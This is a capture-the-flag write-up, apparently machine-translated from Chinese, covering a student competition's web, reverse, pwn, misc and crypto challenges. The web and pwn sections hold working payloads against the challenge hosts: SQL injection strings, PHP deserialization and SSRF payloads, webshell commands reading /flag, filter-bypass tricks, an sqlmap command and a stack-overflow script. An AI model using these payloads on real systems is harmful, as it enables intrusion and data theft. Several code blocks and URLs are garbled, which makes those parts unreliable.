The 2nd Principal Challenge WP

Pie Title Circus: Clown Head "Web" : 20 "reverse" : 5 "crypto" : 10 "PWN" : 2 "misC" : 6 "blockchain" : 1

web

real_checkin

F12 for

upload&include

According to the source tip, is the file upload + file include

Read the source code directly using PHP pseudo-protocol

? file=filter://read=convert.base64-encode/resource=index.php

Well, I can’t read it, and I can’t change the suffix, so I can directly make the picture horse, because I just finished the second rendering problem, upload the picture horse and then directly include the webshell

checkin_http

Get and POST referers, referer indicates which page to jump from, cookie indicates login status and authentication, and user-agent indicates which browser to use to access the page

Final request package: POST /? Flag = 1 HTTP / 1.1

Host: 67a3c31e-85a5-460c-9d12-4653383b9bf9.node.dino209.cn

User-Agent: Dino

Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/avif, image/webp, /; Q = 0.8 Accept – Language: useful – CN, useful; Q = 0.8, useful – TW; Q = 0.7, useful – HK; Q = 0.5, en – US; Q = 0.3, en. Q = 0.2

Accept-Encoding: gzip, deflate

Connection: close

referer:ctf.dino209.cn

Cookie: admin=1

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

easy_rce

Filter pipe character, bypassed with %0a; Filter the root directory, then CD.. Layer by layer; Filter whitespace, ${IFS} replace; Filter cat flags, bypassing them with backslashes

Why can’t I ping IP

easy_md5

Md5 weak type comparison is bypassed

Source:

<? php highlight_file(__FILE__);if(isset($_POST['a']) and isset($_POST['b'])){
    if($_POST['a']! =$_POST['b']) {if (md5($_POST['a']) == md5($_POST['b']))
        echo eval(system('cat /flag'));
        else
        echo 'you are wrong';
    }
    else
    echo "Please enter different a, B values.";
}
else
echo "Please enter a, B value";
 'Please enter a, B valuesCopy the code

Md5 cannot be an MD5 array, returns false, and the comparison succeeds, so post passes the parameter

payload:a[]=1&b[]=2

easy_unser

<? phpclass ReadFile
{
    public $filename = 'fake_flag.txt';
    public function __destruct()
    {
        echo '__destruct read '.$this->filename.'file.<br />';
        $file = file_get_contents(dirname(__FILE__).'/'.$this->filename);
        echo $file;
    }
}
highlight_file('index.php');
$usr = unserialize($_GET['usr']); ? >Copy the code

No such deserialization uses file_get_contents in the __destruct magic method to read the file

payload:http://2ce09c09-fa21-4a56-a706-1788a279de8d.node.dino209.cn?usr=O:8:”ReadFile”:1:{s:8:”filename”; s:16:”.. /.. /.. /.. /flag”; }

Use.. The relative path method of/reads files

Apple’s official website

The Webshell is hanging on the web page, but I don’t know why the ant sword is not connected, and the kitchen knife is not connected, strange

payload:http://e5de5780-b938-4995-a6ac-8bac6ca47113.node.dino209.cn?hacker=system('cat /flag');

login

The administrator forgot the password, so try the universal password

payload:? username=1&password=1' or '1'='1

The payload:? Username =1&password=1′ or ‘1’=’1’%23

login2.0

Like to put two eggs in one basket.

payload1:http://4ce83b79-b525-4003-81e2-103f91d0699a.node.dino209.cn/?username=zhao&password=1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()%23
payload2:http://4ce83b79-b525-4003-81e2-103f91d0699a.node.dino209.cn/?username=zhao&password=1' union select 1, group_concat(column_name) from information_schema.columns WHERE table_name="f14g"%23
payload3:http:/ / 4 ce83b79 - b525 f91d0699a e2-4003-81-103. The node. Dino209. Cn /? Username = zhao&password = 1 'union select 1, 2, f14g the from sqli.f14g%23
Copy the code

Check the library, check the table, check the field, check the data, step by step

EDG for ye

Zhao Xin administrator has the good habit of backing up the website, good to www.zip leakage

www.zip read the site’s key source code as follows:

<? phpfunction Dino($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    echo $output;
}

if (isset($_GET['url'])) {
    Dino($_GET['url']);
}

Copy the code

Standard SSRF payloda: http://3cf2a8b0-93f0-45e1-8959-e2096067bf81.node.dino209.cn?url=file:///flag

shopping

Find the login page, cut package, sqlMap a shuttle

shop2.0

The space union is filtered and injected with an error, but it seems extractValue and uptadeXML are also filtered, so go straight to SQLMap

payload:python sqlmap.py -u "! []()http://0ba7444d-d812-483b-9432-10c43da8a93e.node.dino209.cn/login.php" --data="username='='&password='='" -tamper ! []()space2comment.py --dump

upload_twice_img

Bypass the second rendering, secondary prevention rendered directly upload pictures to the horse and then use the sword even line and photos here are the source of the horse and link to a blog from association cdutsec. Gitee. IO/blog / 2020/0…

It introduces all kinds of ways to bypass file uploading, and it also makes good pictures that can be used directly good, great

null_rce

On the source code:

` 
       `
Copy the code

If numbers and letters are filtered, it is impossible to use ordinary command execution. In this case, you need to use command execution without alphanumeric characters.

Payload can be configured as a payload, xor, etc. Note that the server version of PHP is PHP7.2. In this version,assert cannot call system commands. Call_user_func (,,) uses the first argument as a callback function, injected as call_user_func(~system,~cat /flag, “”)

normal_unser

The source code is as follows:

<? php Class SoFun{ protected $file ="index.php";
    public function __construct($file){
        $this->file = $file;
    }
    function __destruct(){
        if(! empty($this->file)){if(strchr($this->file,"\")==false && strchr($this->file,'/')==false){ show_source(dirname(__FILE__).'/'.$this->file); }else{ die("Wrong filename"); } } } function __wakeup(){ $this->file='index.php'; } public function __toString(){ return ''; } } if(! isset($_GET['file'])){ show_source('index.php'); }else{ $file = base64_decode($_GET['file']); echo unserialize($file); } // key in flag.phpCopy the code

The __wakeup magic method overwrites the file attribute entered in the deserialization as index.php. In order not to be overridden, wakeup will not be executed if the deserialization is greater than the number of attributes of the original class

payload:? O: 5: "SoFun: 2: {S: 7:00 00 \ * \" file "; S: 8: "flag. PHP"; }

upload_zip

phar

First write a sentence horse, change the suffix to JPG, and then compress, and then change to JPG upload, and then use Phar to read the compressed content in THE form of PHP

famliy_md5

<? php include('flag.php');
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
$a = $_GET['a'];
$b = $_GET['b'];
highlight_file(__FILE__);
if(isset($_POST['aa']) and isset($_POST['bb'])){
    if($_POST['aa']! =$_POST['bb']) {if (md5($_POST['aa']) == md5($_POST['bb'])){
            if (isset($a) && isset($b)) {
                if($a ! = $b &&0 == md5(md5($b))){
                    if(substr(md5($_GET['c']),0.5) = ='9331c') {if(! is_numeric($string_1)){ $md5_1 = md5($string_1); $md5_2 = md5($string_2);if($md5_1 ! = $md5_2){ $a = strtr($md5_1,'cxhp'.'0123');
                                $b = strtr($md5_2, 'cxhp'.'0123');
                                if($a == $b){
                                    echo $flag;
                                }
                                else{
                                    die("can u give me the right str???"); }}else{
                                die("no!!!!!!!!"); }}}}else {
                    echo "wrong!"; }}else {
                echo 'wrong!!!! '; }}else
        echo 'you are wrong';
    }
    else
    echo "Please enter different a, B values.";
}
else
echo "Please enter a, B value"; Please enter a, b valuesCopy the code

Aa =QNKCDZO&BB=AABG7XSs; aa=QNKCDZO&BB=AABG7XSs

Md5 (md5($b))==0 md5($b) ==0 Is equal to b, just pass it around

The first five of md5(c) should be 9331c, which is the MD5 truncation comparison. Rainbow table is needed

The script is as follows:

from multiprocessing.dummy import Pool as tp
import hashlib

knownMd5 = '9331c'

def md5(text):
    return hashlib.md5(str(text).encode('utf-8')).hexdigest()

def findCode(code):   
    key = code.split(':')
    start = int(key[0])  
    end = int(key[1]) 
    for code in range(start, end):
        if md5(code)[0:5] == knownMd5:            
            print code
            break
list=[] 
for i in range(3Stop list.append(STR ();10000000*i) + ':' + str(10000000*(i+1Pool.map (findCode, list) pool.close() pool.join()Copy the code

Get c three possible values for 21175023191798120293 7, take one

STRTR (string a, string b, string C, string C, string C, string C, string C);

str1=9427417&str2=QNKCDZO
Copy the code

Then pass the parameter, OK!

Don’t give me the whole 🐎?

<? php highlight_file(__FILE__); error_reporting(0);
$upload = 'upload/';

if (isset($_POST['file']) {if (preg_match('/htaccess/is', $_POST['file'])) {
        die('? What are you doing here? ');
    }
    if (preg_match('#\w{2,}|[678]|
      , $_POST['content'])) {
        die('You this 🐎 protect green?? ');
    }
    file_put_contents($upload .  $_POST['file'], $_POST['content']);
}
Copy the code

Disable_function disables almost all functions that execute system commands. System,exec,shell_exec,passthru, and even mail are banned. In a rage, I found the flag using highlight, and then I connected it with my classmate’s ant sword. I cried

Some of the things I’ve covered are arrays bypassing regular matches, and file_put_contents is a bug that can write arrays as strings

Content: the file = 1. Php&content [] = c = <? php $a=opendir("/"); while (($file = readdir($a)) ! == false){echo $file . "<br>"; }; highlight_file("/flag"); ? >

Loop through the root directory to find files with flag. If flag is not named by flag, the problem will split

fake_news

The PHP version is 8.1dev

Through user-agent to command execution, directly look at other people’s detailed blog

www.jianshu.com/p/d0576ee19…

easy_cms

Cicada knows 7.7 bug, others detailed blog:

www.cnblogs.com/vnknow/p/15…

reverse

Opening and closing of IDA

Ida64 Open Shift + F12 to see flag

f12

Open the file TAB and see the pseudo code. In the main function, the false flag is replaced with 5 characters. The final flag is dino{tHi5_I5_FlaG}.

I am very exclusive or

Key code IDA sees when opening I:

The keywordF8y[lUk<2_CKey =flag^v(10-20)+1, xor, if a=c^b, then b=a^c, then I can do it by hand, I can do it by hand, flag=(key-1)^v(10-20), xor bit by bit

flag:dino{thI5_15_X0r}

Free Flagg

I even installed a MacOS virtual machine for this problem. If you open macOS, you can see flag directly. Take a screenshot to see the new version of macOS

Out the snake

Pyc decompiled key code:

for i in range(l): key=((ord(flag[i])+i)%128+128)%128 code+=chr(key) code=list(code) if code[:] ! =txt[:]: print(u'\u9519\u8bef')Copy the code

Increasing modulus to get flag, then reverse decrementing, decreasing modulus by bit

84, 105, 107, 118, 99, 54, 89, 102, 77, 106, 63, 4, 113, 101, 115

Bit-by-bit decression yields flag:dino{This_1S_Ea5yeXe}

pwn

Network cat

Nc connection, NC IP port, and then directly execute the system command ls; cat /flag

RIP

Standard stack overflow, gets from 1 to F, a total of 16 bytes, that is filled with 16 as, because it is a 64-bit program, so +8, starting at 0x401186, +1 is for stack balance, like the original buU problem

Put down the content:

from pwn import *

p = remote("ctf.dino209.cn".9137)

payload= b'a' * (0xf + 8) + p64(0x401186+1)

p.sendline(payload)
p.sendline('cat flag')
p.interactive()
#gdb 

Copy the code

misc

checkin

Observe the reverse order of filename, galf, flag, try reverse order, get flag

A warrior fights a dragon

Open it with Stegsolve and put it frame by frame. We can see that there are words in the middle of two frames of pictures

challenge_1

Address: 330 k. The dead simple. IO/misc_tools /…

Null wide character

Audacity on and off

Open it with Audacity, look at the spectrum map, and see what a shit it is. Later, when I see hint, I set the frequency to the highest, that is, 24000Hz, and see flag at the top

Start and shut down a VM

This is vmware open cat Flag ah, there is no other operation

dddd

blockchain

Area, ah calculate, sent twice all examine and verify nevertheless, oneself online website seeks

Lock to the criminal suspect X 0 xe40d749510e6db989839b323b73f87de50ff104f first payment deal, a person’s account is the flag

crypto

crypto 1

Hint: Emoij + AES, Base100, Aes, Aes, aes, aes

IO /2020/03/emo…

crypto 2

Affine passwords, online at wtool.com.cn/affine.html

crypto 3

Core socialist values code, baidu, you will know

crypto 4

Talk to the bear :hi.pcmoe.net/

New Buddha says encryption: hi.pcmoe.net/buddha.html

Flag: dino {Nam0_Amit3bha_Buddha}

Shuttle a

base64… base64… Base64, solve until you can’t solve, then base32, and then ASCII

AES encryption and decryption

Print (a.encrypt(pad(flag)))

RSA1

We know c,p,q,e and find m

import libnum
from Crypto.Util.number import long_to_bytes
c = 0x188b27bd2ae3da15ff2103fc86bcfd1691f64226c588e35fd19795c4086270acbc6b5a005a69b795a80e60ec8a3028711152b37e85a45dd8f8ac3f 879d6e0c417f8fd913ae9b01082b0334768424671825cf6dc6808742289ec8bd43606e5076204c2e5d499b349954e07f2931878ea52d1ce8810388f6 354e57bf83ea
n = 446157489815372090628083183750628890093917728614617620378664607362175731122477861394257219559376045598306357387880634352 268896703664728085623800712937731086442713096100892522378110311173171320410188243620330918019948034739478258426692080526 5511438418405102673818869071773717640225796442487874824466921
e = 0x10001
q = 174969602493406570251998312184742855749497614515276930299475072453401809437756974135968398261353406290953561750478749153 0675721865409540938509235897013
p = 254991429058190134121417182775182656857844424880304415690069221765183883139145396109931934981881185592378644503654103898 6687960441035107848332691762917
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n) # m in decimal form
string = long_to_bytes(m) # m clear
print(string) # the result is of the form B 'm'
Copy the code

Poor flag

The Swiss Army Knife of cryptography: gchq.github. IO /CyberChef

According to Hint magic

brute_force

As in the previous problem, change the mode to XOR

baby rsa

rsa coppersmith

Bit operation, known p,q high order, from the oracle blog script

www.jianshu.com/p/d8d2ce530…

rom sage.all_cmdline import *   # importsage library _sage_const_540341563304810547543305707542235696800135945210608675495026649105740307830203676496758821540246401465995018 600994168163186192910659972415560771721373496907341043520877797136722087619227237457669935338586590625673696242143228035 107631938157263432099549193412009946104977942814964539807608761286648906079792940877861972188567619049463005549852532333 354830164549866294320349496892972410054788931729466850336361632021903440629384926828432173475706537851118639473975554704 894391075883312216532185728234874849651680599284595265554301702930216055076836865944088430939567590243172944485145425487 116613027314187352806705212604943571584770396229757147826920443701729498867368781640407217143139619243666700520069646531 517467770326505701819479606479815301049226452173129121254735089488142434959869103222548120464676808657780984107840422368 521001173888519767138517917692756124336264201192801527347543880483530520217014467555185864582715221771505659584042448120 757214628508118412248357916629380623400083664717275892820769655849123286407768439009760212492202507369364222351810962060 691321779502456199804099717498681009974770787830630002690101004078180928884664546341288537811825699441566211488216889046 787221216658574161520643814195819834258523868559663268780075436480104146041883277966767555256486173590308835551986128404 422094780332508252452788867825255486776922033517803537366353882651584519450733753978475816592844528221358626515160189914 280182333857723863592312608804356301893966013763770243703542614903729297575881737919113216061031042701315331891146573830 574671755699601792395360566471728791987232401169182434227389828239636695005096603936188855362692684975621653353181754100 541120475920450549952284281404099428525678051756772847264951147581667935169518533458616548995299837108222418904556485636 688845489239984229917230737514132890203753510394273744606279124474934596961945049302610202649441669322441648067369675857 779243125432878422802034247011658011846194412644664211114458070162182921625984382068745554362839874163774231000345367250 297433851375011478757945745309452490724863081876229348524271412877788623125208995727881462218369257249700108645045179997 388622685194415808118596701095441795074311688864793947334791674647972949533435478765712354208692480669464771649098568383 008535833648801653110152020318961072065525738885352767212958592807940748463452474461685300605315229707863288777256925363 490927195298776513274244731701487512162688865953816579940723796388989231285177 = Integer(540341563304810547543305707542235696800135945210608675495026649105740307830203676496758821540246401465995018600994168163 186192910659972415560771721373496907341043520877797136722087619227237457669935338586590625673696242143228035107631938157 263432099549193412009946104977942814964539807608761286648906079792940877861972188567619049463005549852532333354830164549 866294320349496892972410054788931729466850336361632021903440629384926828432173475706537851118639473975554704894391075883 312216532185728234874849651680599284595265554301702930216055076836865944088430939567590243172944485145425487116613027314 187352806705212604943571584770396229757147826920443701729498867368781640407217143139619243666700520069646531517467770326 505701819479606479815301049226452173129121254735089488142434959869103222548120464676808657780984107840422368521001173888 519767138517917692756124336264201192801527347543880483530520217014467555185864582715221771505659584042448120757214628508 118412248357916629380623400083664717275892820769655849123286407768439009760212492202507369364222351810962060691321779502 456199804099717498681009974770787830630002690101004078180928884664546341288537811825699441566211488216889046787221216658 574161520643814195819834258523868559663268780075436480104146041883277966767555256486173590308835551986128404422094780332 508252452788867825255486776922033517803537366353882651584519450733753978475816592844528221358626515160189914280182333857 723863592312608804356301893966013763770243703542614903729297575881737919113216061031042701315331891146573830574671755699 601792395360566471728791987232401169182434227389828239636695005096603936188855362692684975621653353181754100541120475920 450549952284281404099428525678051756772847264951147581667935169518533458616548995299837108222418904556485636688845489239 984229917230737514132890203753510394273744606279124474934596961945049302610202649441669322441648067369675857779243125432 878422802034247011658011846194412644664211114458070162182921625984382068745554362839874163774231000345367250297433851375 011478757945745309452490724863081876229348524271412877788623125208995727881462218369257249700108645045179997388622685194 415808118596701095441795074311688864793947334791674647972949533435478765712354208692480669464771649098568383008535833648 801653110152020318961072065525738885352767212958592807940748463452474461685300605315229707863288777256925363490927195298 776513274244731701487512162688865953816579940723796388989231285177); _sage_const_524120196880892113405017313004037875742623272780294430699324409011685631972967533301049159702503354967757742 839170808994636518191867775038194817729921786361200549648908363045464490776512772960581035597838071812760547822278330444 495107428747524073848279038314530268396297857619988289504753840116586027217422821601878769906804754611241747380156005617 999711071634153892486176373495559459346143516060352727113771218854123402360310841090401364210711895154023918589430582183 867527588291864702683574317656281424227587036989292858838998274578098404811607237947635247877013614561650120194917884174 238289783038037075898139583951444068917933551317035544335687089358343681758264470931103695612741548040247674149893681707 552207199278213690021547833755339410067985475388902308354016775914034850645625781106980339954799595246825792637331571891 0639764764232215926808969594411785550344830069052123790136787131013417463367708174380965498190778 = Integer(524120196880892113405017313004037875742623272780294430699324409011685631972967533301049159702503354967757742839170808994 636518191867775038194817729921786361200549648908363045464490776512772960581035597838071812760547822278330444495107428747 524073848279038314530268396297857619988289504753840116586027217422821601878769906804754611241747380156005617999711071634 153892486176373495559459346143516060352727113771218854123402360310841090401364210711895154023918589430582183867527588291 864702683574317656281424227587036989292858838998274578098404811607237947635247877013614561650120194917884174238289783038 037075898139583951444068917933551317035544335687089358343681758264470931103695612741548040247674149893681707552207199278 213690021547833755339410067985475388902308354016775914034850645625781106980339954799595246825792637331571891063976476423 2215926808969594411785550344830069052123790136787131013417463367708174380965498190778); _sage_const_511485371035826233163223876900632060043223778037436528679520857002353673508682744488894353814521503729904065 894388954564617571517086704631195402056745661923057797919753232045739275108778436209587993444971094573077309738350397403 573541144120379508527241328880942149016648048585304980464845796025762694127437699805320231367981300351061751945443364650 241700355081477547600866896510354206133910924277966597412042182862023141290124054260115682717536991759224117685689751826 946176664268311155836113873621203988205931893995409811534530761405403784499038157727167210780000346999852568898696650316 703912094292930064301112360393450781864183592426358511227051978700908893075115971415341093117495420503358497242926541467 062748067387616600953964467304223932822696595982777820057059036629842631494786125334833524203586933008446455046210513097 310702124084531924257654243430059827477662033549829650559617734393571834850222450312056514157811075940135361428014738912 748915762687919299124229823827170127026295356028369575342940886751445170463836724544255656970553551612866017592391866668 062143009580911263232916464662303167307670980319011033766000717287133403974906109252188970360668186080300075403810017147 918807564401341362676993192174581082606526765366180302464332879663717894223614021435660239088905667834289539746765556627 494659564798122336016973681924774455815865490107516069192515029519262045085608785765533900272533800577773293993270718849 053608116851200511772789887135802678606133549049206736609622559943692004964475444054524620696689076620754280388522537659 841740979817098968798616116461763090515530673562107103359120591882859912988245972486933500047442003251658597738126621764 392411291197171270936174954800599519467449963963513977042115160860122281248303759967484696925087309320387610809261946713 547845166721049840645099827779758481313838988441443899721192136761077947369492191264396985604020710323310101541081624358 585597654300803323251469841469014108402307388417767911769532418795757357559626772094028356958643012752493666724113825694 199837339924960648479800359940704181587323189083459561747759990219630082832460114681788184983617606704408307913974123949 273028011936561860844455924916320635438948247316851967252307680191501423159938968817861792708880725797445805126565332641 808984745512672794769248362225707464661640943541057233492790597524628259067521891072177576261021376851391111942391371405 35393309468412366539945174005436555111880116203207348311952802627923673018900 = Integer(511485371035826233163223876900632060043223778037436528679520857002353673508682744488894353814521503729904065894388954564 617571517086704631195402056745661923057797919753232045739275108778436209587993444971094573077309738350397403573541144120 379508527241328880942149016648048585304980464845796025762694127437699805320231367981300351061751945443364650241700355081 477547600866896510354206133910924277966597412042182862023141290124054260115682717536991759224117685689751826946176664268 311155836113873621203988205931893995409811534530761405403784499038157727167210780000346999852568898696650316703912094292 930064301112360393450781864183592426358511227051978700908893075115971415341093117495420503358497242926541467062748067387 616600953964467304223932822696595982777820057059036629842631494786125334833524203586933008446455046210513097310702124084 531924257654243430059827477662033549829650559617734393571834850222450312056514157811075940135361428014738912748915762687 919299124229823827170127026295356028369575342940886751445170463836724544255656970553551612866017592391866668062143009580 911263232916464662303167307670980319011033766000717287133403974906109252188970360668186080300075403810017147918807564401 341362676993192174581082606526765366180302464332879663717894223614021435660239088905667834289539746765556627494659564798 122336016973681924774455815865490107516069192515029519262045085608785765533900272533800577773293993270718849053608116851 200511772789887135802678606133549049206736609622559943692004964475444054524620696689076620754280388522537659841740979817 098968798616116461763090515530673562107103359120591882859912988245972486933500047442003251658597738126621764392411291197 171270936174954800599519467449963963513977042115160860122281248303759967484696925087309320387610809261946713547845166721 049840645099827779758481313838988441443899721192136761077947369492191264396985604020710323310101541081624358585597654300 803323251469841469014108402307388417767911769532418795757357559626772094028356958643012752493666724113825694199837339924 960648479800359940704181587323189083459561747759990219630082832460114681788184983617606704408307913974123949273028011936 561860844455924916320635438948247316851967252307680191501423159938968817861792708880725797445805126565332641808984745512 672794769248362225707464661640943541057233492790597524628259067521891072177576261021376851391111942391371405353933094684 12366539945174005436555111880116203207348311952802627923673018900); _sage_const_65537 = Integer(65537); _sage_const_4096 = Integer(4096); _sage_const_2 = Integer(2); _sage_const_0p4 = RealNumber('0.4'); _sage_const_0 = Integer(0); _sage_const_1 = Integer(1)
from sage.all import *
importbinascii n = _sage_const_540341563304810547543305707542235696800135945210608675495026649105740307830203676496758821540246401465995018 600994168163186192910659972415560771721373496907341043520877797136722087619227237457669935338586590625673696242143228035 107631938157263432099549193412009946104977942814964539807608761286648906079792940877861972188567619049463005549852532333 354830164549866294320349496892972410054788931729466850336361632021903440629384926828432173475706537851118639473975554704 894391075883312216532185728234874849651680599284595265554301702930216055076836865944088430939567590243172944485145425487 116613027314187352806705212604943571584770396229757147826920443701729498867368781640407217143139619243666700520069646531 517467770326505701819479606479815301049226452173129121254735089488142434959869103222548120464676808657780984107840422368 521001173888519767138517917692756124336264201192801527347543880483530520217014467555185864582715221771505659584042448120 757214628508118412248357916629380623400083664717275892820769655849123286407768439009760212492202507369364222351810962060 691321779502456199804099717498681009974770787830630002690101004078180928884664546341288537811825699441566211488216889046 787221216658574161520643814195819834258523868559663268780075436480104146041883277966767555256486173590308835551986128404 422094780332508252452788867825255486776922033517803537366353882651584519450733753978475816592844528221358626515160189914 280182333857723863592312608804356301893966013763770243703542614903729297575881737919113216061031042701315331891146573830 574671755699601792395360566471728791987232401169182434227389828239636695005096603936188855362692684975621653353181754100 541120475920450549952284281404099428525678051756772847264951147581667935169518533458616548995299837108222418904556485636 688845489239984229917230737514132890203753510394273744606279124474934596961945049302610202649441669322441648067369675857 779243125432878422802034247011658011846194412644664211114458070162182921625984382068745554362839874163774231000345367250 297433851375011478757945745309452490724863081876229348524271412877788623125208995727881462218369257249700108645045179997 388622685194415808118596701095441795074311688864793947334791674647972949533435478765712354208692480669464771649098568383 008535833648801653110152020318961072065525738885352767212958592807940748463452474461685300605315229707863288777256925363 490927195298776513274244731701487512162688865953816579940723796388989231285177 # here16Hexadecimal number p4 =_sage_const_52412019688089211340501731300403787574262327278029443069932440901168563197296753330104915970250335496775774 283917080899463651819186777503819481772992178636120054964890836304546449077651277296058103559783807181276054782227833044 449510742874752407384827903831453026839629785761998828950475384011658602721742282160187876990680475461124174738015600561 799971107163415389248617637349555945934614351606035272711377121885412340236031084109040136421071189515402391858943058218 386752758829186470268357431765628142422758703698929285883899827457809840481160723794763524787701361456165012019491788417 423828978303803707589813958395144406891793355131703554433568708935834368175826447093110369561274154804024767414989368170 755220719927821369002154783375533941006798547538890230835401677591403485064562578110698033995479959524682579263733157189 10639764764232215926808969594411785550344830069052123790136787131013417463367708174380965498190778 # p levels16Hexadecimal cipher = _sage_const_511485371035826233163223876900632060043223778037436528679520857002353673508682744488894353814521503729904065 894388954564617571517086704631195402056745661923057797919753232045739275108778436209587993444971094573077309738350397403 573541144120379508527241328880942149016648048585304980464845796025762694127437699805320231367981300351061751945443364650 241700355081477547600866896510354206133910924277966597412042182862023141290124054260115682717536991759224117685689751826 946176664268311155836113873621203988205931893995409811534530761405403784499038157727167210780000346999852568898696650316 703912094292930064301112360393450781864183592426358511227051978700908893075115971415341093117495420503358497242926541467 062748067387616600953964467304223932822696595982777820057059036629842631494786125334833524203586933008446455046210513097 310702124084531924257654243430059827477662033549829650559617734393571834850222450312056514157811075940135361428014738912 748915762687919299124229823827170127026295356028369575342940886751445170463836724544255656970553551612866017592391866668 062143009580911263232916464662303167307670980319011033766000717287133403974906109252188970360668186080300075403810017147 918807564401341362676993192174581082606526765366180302464332879663717894223614021435660239088905667834289539746765556627 494659564798122336016973681924774455815865490107516069192515029519262045085608785765533900272533800577773293993270718849 053608116851200511772789887135802678606133549049206736609622559943692004964475444054524620696689076620754280388522537659 841740979817098968798616116461763090515530673562107103359120591882859912988245972486933500047442003251658597738126621764 392411291197171270936174954800599519467449963963513977042115160860122281248303759967484696925087309320387610809261946713 547845166721049840645099827779758481313838988441443899721192136761077947369492191264396985604020710323310101541081624358 585597654300803323251469841469014108402307388417767911769532418795757357559626772094028356958643012752493666724113825694 199837339924960648479800359940704181587323189083459561747759990219630082832460114681788184983617606704408307913974123949 273028011936561860844455924916320635438948247316851967252307680191501423159938968817861792708880725797445805126565332641 808984745512672794769248362225707464661640943541057233492790597524628259067521891072177576261021376851391111942391371405 35393309468412366539945174005436555111880116203207348311952802627923673018900 e2 = _sage_const_65537 pbits = _sage_const_4096 kbits = pbits - p4.nbits() print (p4.nbits()) p4 = p4 << kbits PR = PolynomialRing(Zmod(n), names=('x')); (x,) = PR._first_ngens(1)
f = x + p4
roots = f.small_roots(X=_sage_const_2 **kbits, beta=_sage_const_0p4 )
if roots:
   p = p4+int(roots[_sage_const_0 ])
   print ("p: ", hex(int(p)))
   assert n % p == _sage_const_0 
   q = n/int(p)
   print ("q: ". hex(int(q))) print (gcd(p,q)) phin = (p-_sage_const_1 )*(q-_sage_const_1 ) print (gcd(e2,phin)) d = inverse_mod(e2,phin)  flag = pow(cipher,d,n) flag = hex(int(flag))[_sage_const_2 :-_sage_const_1 ] print (binascii.unhexlify(flag))Copy the code

It’s one o ‘clock. It’s gone